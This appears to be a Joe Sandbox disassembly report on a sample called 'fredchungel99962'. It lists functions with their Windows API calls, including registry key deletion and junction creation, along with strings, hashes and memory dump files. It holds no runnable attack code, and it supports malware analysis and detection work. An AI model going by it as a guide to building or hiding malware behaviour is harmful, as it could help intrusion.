Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: 8lr
API String ID: 641708696-2725927297
Opcode ID: 462b2e1b5c7bb2525623a566689053514754a4ea61167fb6cc3dcff626f7874e
Instruction ID: 8b869c2f43b8db0924a49c527ba1d8d472879604329e17e18c92ad0400fe1f5c
Opcode Fuzzy Hash: 462b2e1b5c7bb2525623a566689053514754a4ea61167fb6cc3dcff626f7874e
Instruction Fuzzy Hash: 4B61ED71022701DFEB3A9F28C549B6A7BF5FB40716F00861CE2428B998C775BA91CF80

Uniqueness

Uniqueness Score: -1.00%

Function 012C9838 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 012C9944: GetWindowLongW.USER32(?,000000EB), ref: 012C9952

GetSysColor.USER32 ref: 012C9862

Strings

8lr, xrefs: 012C987C

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ColorLongWindow
String ID: 8lr
API String ID: 259745315-2725927297
Opcode ID: 37c5dd910762983d01cbc1eea284e7071ffc613cf213451aa6a0142ef54935f9
Instruction ID: 8dd3320d8f3ad7deeaa8f4d141281e7e3fb194a7ba4833c8297e88fb43d8fd30
Opcode Fuzzy Hash: 37c5dd910762983d01cbc1eea284e7071ffc613cf213451aa6a0142ef54935f9
Instruction Fuzzy Hash: 8141C135111640EFEF315F3C9888BBA3BA9AB05738F144749FBA2871D5CB71A982CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0134856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 01348592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 013485A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 013485AD
CloseHandle.KERNEL32(00000000), ref: 013485BA
GlobalLock.KERNEL32 ref: 013485C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 013485D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 013485E0
CloseHandle.KERNEL32(00000000), ref: 013485E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 013485F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0134FC38,?), ref: 01348611
GlobalFree.KERNEL32(00000000), ref: 01348621
GetObjectW.GDI32(?,00000018,?), ref: 01348641
CopyImage.USER32 ref: 01348671
DeleteObject.GDI32(?), ref: 01348699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 013486AF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 2931b53aa1bd39da46164f9b9af3d5e84187034db0b26feea643a003ff2e1374
Instruction ID: 6402a0f02af4080fbf5e91df32ca558f8063733dc29503fae58b36bcfe729a50
Opcode Fuzzy Hash: 2931b53aa1bd39da46164f9b9af3d5e84187034db0b26feea643a003ff2e1374
Instruction Fuzzy Hash: 96412B79601208AFDB21DFA9CC48EAE7BBCFF89715F144058F909E7254DB74A901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013214BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 01321502
VariantCopy.OLEAUT32(?,?), ref: 0132150B
VariantClear.OLEAUT32(?), ref: 01321517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 013215FB
VarR8FromDec.OLEAUT32(?,?), ref: 01321657
VariantInit.OLEAUT32(?), ref: 01321708
SysFreeString.OLEAUT32(?), ref: 0132178C
VariantClear.OLEAUT32(?), ref: 013217D8
VariantClear.OLEAUT32(?), ref: 013217E7
VariantInit.OLEAUT32(00000000), ref: 01321823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 01321625
Default, xrefs: 013216AF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 287f85aaae2b7412dc384222eb165528ba427f377c186e6c1258dbf36009f3d8
Instruction ID: f81576ce9863071356f377ccfc69f9af07c3139a6b236e30390d4ba753929730
Opcode Fuzzy Hash: 287f85aaae2b7412dc384222eb165528ba427f377c186e6c1258dbf36009f3d8
Instruction Fuzzy Hash: E8D11B71A00129DBDB10FF69D684BBDB7B9FF05708F18819AE506AB680DB30ED45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0133B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

Part of subcall function 0133C998: CharUpperBuffW.USER32(?,?), ref: 0133C9B5
Part of subcall function 0133C998: _wcslen.LIBCMT ref: 0133C9F1
Part of subcall function 0133C998: _wcslen.LIBCMT ref: 0133CA68
Part of subcall function 0133C998: _wcslen.LIBCMT ref: 0133CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0133B6F4
RegOpenKeyExW.ADVAPI32 ref: 0133B772
RegDeleteValueW.ADVAPI32 ref: 0133B80A
RegCloseKey.ADVAPI32(?), ref: 0133B87E
RegCloseKey.ADVAPI32(?), ref: 0133B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0133B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0133B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0133B922
FreeLibrary.KERNEL32(00000000), ref: 0133B983
RegCloseKey.ADVAPI32(00000000), ref: 0133B994

Strings

RegDeleteKeyExW, xrefs: 0133B8FE
advapi32.dll, xrefs: 0133B8ED

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: b30d1e38adfce0c3d7e2ddea9c017a4c81a33911e84d4d83c32a3b3fca95d1f2
Instruction ID: cbd431108af3b9841610d4784cf36409c943dd917ec4bf90c7d2889069a6a8a8
Opcode Fuzzy Hash: b30d1e38adfce0c3d7e2ddea9c017a4c81a33911e84d4d83c32a3b3fca95d1f2
Instruction Fuzzy Hash: 8DC19E34204242AFD720DF18C494F6AFBE5FF84358F18849DE59A8B7A2CB31E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01348D0E Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

PostMessageW.USER32 ref: 01348D5A
GetFocus.USER32 ref: 01348D6A
GetDlgCtrlID.USER32 ref: 01348D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 01348E1D
GetMenuItemInfoW.USER32 ref: 01348ECF
GetMenuItemCount.USER32(?), ref: 01348EEC
GetMenuItemID.USER32(?,00000000), ref: 01348EFC
GetMenuItemInfoW.USER32 ref: 01348F2E
GetMenuItemInfoW.USER32 ref: 01348F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01348FA1

Strings

8lr, xrefs: 01348E63, 01348E85
0, xrefs: 01348E9F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0$8lr
API String ID: 1026556194-359200609
Opcode ID: 4710fe6d29fcb3db673d1cebd5c20171210cd89f0cad865b07be5cd3e632b203
Instruction ID: adc27699a9587d64acd8b5cc9fe2d0ab44ebae08a9558d966f9aecc1707ace1a
Opcode Fuzzy Hash: 4710fe6d29fcb3db673d1cebd5c20171210cd89f0cad865b07be5cd3e632b203
Instruction Fuzzy Hash: B981E5715043019FD721CF68D884AABBBE9FF88758F04099DFA9897281DB30F945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0134541D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01345504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01345515
CharNextW.USER32(00000158), ref: 01345544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01345585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0134559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 013455AC

Strings

8lr, xrefs: 0134545F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$CharNext
String ID: 8lr
API String ID: 1350042424-2725927297
Opcode ID: 86e8c17bc2284d44681511f714ea63bd85c553f463a966fc2b2bedfe2b7688f7
Instruction ID: 9cd9045b650924f4b96207143922f10442fa0a8e637641c057f65926cd18d1be
Opcode Fuzzy Hash: 86e8c17bc2284d44681511f714ea63bd85c553f463a966fc2b2bedfe2b7688f7
Instruction Fuzzy Hash: 39617475D05209AFEF209F54CC849FE7BF9EB06729F048145FA25AB290D774A641CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0133255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 013325D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 013325E8
CreateCompatibleDC.GDI32(?), ref: 013325F4
SelectObject.GDI32(00000000,?), ref: 01332601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0133266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 013326AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 013326D0
SelectObject.GDI32(?,?), ref: 013326D8
DeleteObject.GDI32(?), ref: 013326E1
DeleteDC.GDI32(?), ref: 013326E8
ReleaseDC.USER32(00000000,?), ref: 013326F3

Strings

(, xrefs: 0133268D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 0706154fbe53d70f7bd6382a4fae06facd562dca77c5de3fd5e62960f27a5f48
Instruction ID: 2323fd39e51aee6d89ab74fc3bfe27219c767b5e2d0c37dd20fd48a96061a7ba
Opcode Fuzzy Hash: 0706154fbe53d70f7bd6382a4fae06facd562dca77c5de3fd5e62960f27a5f48
Instruction Fuzzy Hash: EF610275D00219EFCF15CFA8D884EAEBBBAFF48310F208529E956A7250D770A941CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012EDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 012EDAA1

Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED659
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED66B
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED67D
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED68F
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED6A1
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED6B3
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED6C5
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED6D7
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED6E9
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED6FB
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED70D
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED71F
Part of subcall function 012ED63C: _free.LIBCMT ref: 012ED731

_free.LIBCMT ref: 012EDA96

Part of subcall function 012E29C8: HeapFree.KERNEL32(00000000,00000000), ref: 012E29DE
Part of subcall function 012E29C8: GetLastError.KERNEL32(00000000,?,012ED7D1,00000000,00000000,00000000,00000000,?,012ED7F8,00000000,00000007,00000000,?,012EDBF5,00000000,00000000), ref: 012E29F0

_free.LIBCMT ref: 012EDAB8
_free.LIBCMT ref: 012EDACD
_free.LIBCMT ref: 012EDAD8
_free.LIBCMT ref: 012EDAFA
_free.LIBCMT ref: 012EDB0D
_free.LIBCMT ref: 012EDB1B
_free.LIBCMT ref: 012EDB26
_free.LIBCMT ref: 012EDB5E
_free.LIBCMT ref: 012EDB65
_free.LIBCMT ref: 012EDB82
_free.LIBCMT ref: 012EDB9A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: a29f1625eae6523b413f917d13435257d04fd1a912721a1fe324b6292b56797f
Instruction ID: fb6fb08f1aef474678d45e475b94e581908f674db3a96235b0babdba4225d7a5
Opcode Fuzzy Hash: a29f1625eae6523b413f917d13435257d04fd1a912721a1fe324b6292b56797f
Instruction Fuzzy Hash: D831933155430FDFEF22AAB8E849BA67BE8FF10250FA15419E259D7290EF35E940C720

Uniqueness

Uniqueness Score: -1.00%

Function 0131365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0131369C
_wcslen.LIBCMT ref: 013136A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 01313797
GetClassNameW.USER32(?,?,00000400), ref: 0131380C
GetDlgCtrlID.USER32 ref: 0131385D
GetWindowRect.USER32(?,?), ref: 01313882
GetParent.USER32(?), ref: 013138A0
ScreenToClient.USER32(00000000), ref: 013138A7
GetClassNameW.USER32(?,?,00000100), ref: 01313921
GetWindowTextW.USER32 ref: 0131395D

Strings

%s%u, xrefs: 01313734

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 26a63c06546f68885d888068a4cac5cf770b355fd171a03408bb383f7421197a
Instruction ID: 93f5f0f3ebc5acd80b56cabd0eb58fc3cd884e8045bf677fbac18ab5a56261d5
Opcode Fuzzy Hash: 26a63c06546f68885d888068a4cac5cf770b355fd171a03408bb383f7421197a
Instruction Fuzzy Hash: 6C91B671205206AFD71DDF28C884FFAFBA9FF44368F008529EA99D2154DB30E555CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01314954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 01314994
GetWindowTextW.USER32 ref: 013149DA
_wcslen.LIBCMT ref: 013149EB
CharUpperBuffW.USER32(?,00000000), ref: 013149F7
_wcsstr.LIBVCRUNTIME ref: 01314A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 01314A64
GetWindowTextW.USER32 ref: 01314A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 01314AE6
GetClassNameW.USER32(?,?,00000400), ref: 01314B20
GetWindowRect.USER32(?,?), ref: 01314B8B

Strings

ThumbnailClass, xrefs: 01314A6F, 01314AF1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 91eca3e9d03611cc1ff7b24d4b5422846e73f43b1a884a4926d1bc75fe9af283
Instruction ID: 56f3a8d9b55702ba864a3d937492974e456953cd7bc3d739b74a3127e024af22
Opcode Fuzzy Hash: 91eca3e9d03611cc1ff7b24d4b5422846e73f43b1a884a4926d1bc75fe9af283
Instruction Fuzzy Hash: 1491D3721043069FEB19CF18C984FBA7BE8FF44358F048469FE859A199DB34E945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01343A23 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01343A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01343AA0
GetWindowLongW.USER32(?,000000F0), ref: 01343AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01343AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01343B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 01343BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01343BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 01343BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 01343BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 01343C13

Strings

8lr, xrefs: 01343A67, 01343A76, 01343AAC, 01343B01, 01343C2A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID: 8lr
API String ID: 312131281-2725927297
Opcode ID: 16fb31c6056d6f551d052b933572ef33f7f19fc9bf204d54efc32a5551170592
Instruction ID: b73e0d148bffae4376f31afcfff2efe83970cb6ded610fa530605cd07c895808
Opcode Fuzzy Hash: 16fb31c6056d6f551d052b933572ef33f7f19fc9bf204d54efc32a5551170592
Instruction Fuzzy Hash: 8A616875A00218AFDB20DFA8CC81EEEBBF8FB09714F104199EA15A7291D774A946DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0133CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0133CC64
RegOpenKeyExW.ADVAPI32 ref: 0133CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0133CD48

Part of subcall function 0133CC34: RegCloseKey.ADVAPI32(?), ref: 0133CCAA
Part of subcall function 0133CC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 0133CCBD
Part of subcall function 0133CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 0133CCCF
Part of subcall function 0133CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0133CD05
Part of subcall function 0133CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0133CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0133CCF3

Strings

RegDeleteKeyExW, xrefs: 0133CCC9
advapi32.dll, xrefs: 0133CCB8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: b2ba63f17d76aa8fb61b19122a9120f544e175da926b150b63bd164f8f03e3d1
Instruction ID: d8155d0d428191e4bbb3870ab25b3fe6c8d069f3afaeb8b5f75d22adaf62795c
Opcode Fuzzy Hash: b2ba63f17d76aa8fb61b19122a9120f544e175da926b150b63bd164f8f03e3d1
Instruction Fuzzy Hash: C4316E75902129BBDB318A55DC88EFFBF7CEF86754F001166F902E2204DE349A45DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01323D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 01323D40
_wcslen.LIBCMT ref: 01323D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 01323D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 01323DBE
RemoveDirectoryW.KERNEL32(?), ref: 01323DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 01323E55
CloseHandle.KERNEL32(00000000), ref: 01323E60
CloseHandle.KERNEL32(00000000), ref: 01323E6B

Strings

\??\%s, xrefs: 01323D5B
:, xrefs: 01323D82
\, xrefs: 01323D77

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 03b5a964f879b27579ee984e3b00e0a9c4f5bf9e91016993ec2872f6f0c45c01
Instruction ID: c78d6e51344ad0fa6846be0432c779847dc8ff68f22cf15f22d56215dcab88d1
Opcode Fuzzy Hash: 03b5a964f879b27579ee984e3b00e0a9c4f5bf9e91016993ec2872f6f0c45c01
Instruction Fuzzy Hash: F1319276A0025AABDB31ABA4DC48FEF37BDFF88704F1041B5F609D6154EB74A2448B24

Uniqueness

